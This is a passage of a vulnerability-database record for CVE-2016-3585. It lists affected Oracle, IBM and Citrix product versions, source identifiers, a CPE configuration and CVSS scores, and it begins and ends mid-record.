"siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003872", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, ], trust: 0.6, }, cve: "CVE-2016-3585", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 5.8, confidentialityImpact: "PARTIAL", exploitabilityScore: 8.6, id: "CVE-2016-3585", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 5.8, confidentialityImpact: "PARTIAL", exploitabilityScore: 8.6, id: "VHN-92404", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:P/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "HIGH", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 7.4, 